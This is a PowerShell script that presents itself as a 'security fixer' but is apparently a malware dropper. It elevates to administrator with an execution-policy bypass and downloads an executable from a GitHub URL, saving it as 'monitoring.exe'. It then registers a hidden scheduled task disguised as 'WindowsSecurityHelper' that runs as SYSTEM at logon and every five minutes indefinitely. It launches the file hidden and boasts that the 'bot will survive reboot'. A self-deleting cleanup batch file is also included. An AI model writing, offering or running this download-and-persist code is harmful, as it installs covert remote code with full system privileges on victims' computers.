# secfnx.ps1 - FULLY WORKING VERSION (November 10, 2025)
# Runs monitoring.exe on startup, hidden, forever

$TempFolder = Join-Path $env:TEMP "security_fixer"
if (-not (Test-Path $TempFolder)) { New-Item -Path $TempFolder -ItemType Directory -Force | Out-Null }

$ExeName    = "monitoring.exe"
$ExeUrl     = "https://raw.githubusercontent.com/ArthOfficial/TEST/main/securety_fixer.exe"
$ExePath    = Join-Path $TempFolder $ExeName
$BatPath    = Join-Path $env:TEMP "secfix_un.bat"
$TaskName   = "WindowsSecurityHelper"
$LogFile    = Join-Path $TempFolder "install.log"

# --- Simple Logging ---
function Log { param($msg) Add-Content -Path $LogFile -Value "$(Get-Date -Format 'yyyy-MM-dd HH:mm:ss') - $msg" }

# --- Elevate to Admin ---
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Start-Process powershell.exe -Verb RunAs -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`""
    exit
}

# --- Download monitoring.exe ---
if (-not (Test-Path $ExePath)) {
    try {
        Invoke-WebRequest -Uri $ExeUrl -OutFile $ExePath -UseBasicParsing -ErrorAction Stop
        Log "Downloaded monitoring.exe"
    } catch {
        Log "ERROR: Download failed - $_"
        exit
    }
}

# --- Create uninstall bat (hidden, self-delete, kills task) ---
$BatContent = @'
@echo off
if not defined IS_HIDDEN (start /B cmd /c "%~f0" IS_HIDDEN=1 & exit /b)
set LOG=%TEMP%\errors.log
:Kill
taskkill /F /IM monitoring.exe >nul 2>>%LOG%
taskkill /F /IM go.exe >nul 2>>%LOG%
schtasks /delete /tn WindowsSecurityHelper /f >nul 2>>%LOG%
timeout /t 2 >nul
if exist "%TEMP%\security_fixer" rmdir /S /Q "%TEMP%\security_fixer"
if exist "%~f0" del /F /Q "%~f0"
exit
'@

Set-Content -Path $BatPath -Value $BatContent -Encoding ASCII
Log "Created secfix_un.bat"

# --- Create Scheduled Task (FIXED - NO ERRORS) ---
$Action    = New-ScheduledTaskAction -Execute $ExePath

# Trigger 1: At user logon
$Trigger1  = New-ScheduledTaskTrigger -AtLogOn

# Trigger 2: Repeat every 5 minutes forever (starts in 1 minute)
$Trigger2  = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) `
             -RepetitionInterval (New-TimeSpan -Minutes 5) `
             -RepetitionDuration ([TimeSpan]::MaxValue)

# Settings: Hidden, no time limit
$Settings  = New-ScheduledTaskSettingsSet -Hidden -ExecutionTimeLimit (New-TimeSpan -Hours 0)

# Run as SYSTEM with highest privileges
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest

try {
    # Remove old task
    Unregister-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue -Confirm:$false

    # Create new task
    Register-ScheduledTask -TaskName $TaskName `
                           -Action $Action `
                           -Trigger @($Trigger1, $Trigger2) `
                           -Settings $Settings `
                           -Principal $Principal `
                           -Force | Out-Null

    Log "SUCCESS: Task '$TaskName' created - will run on startup + every 5 mins"
} catch {
    Log "ERROR: Failed to create task - $_"
}

# --- Run now ---
Start-Process -FilePath $ExePath -WindowStyle Hidden
Log "Started monitoring.exe immediately"

Log "Installation complete. Bot will survive reboot."
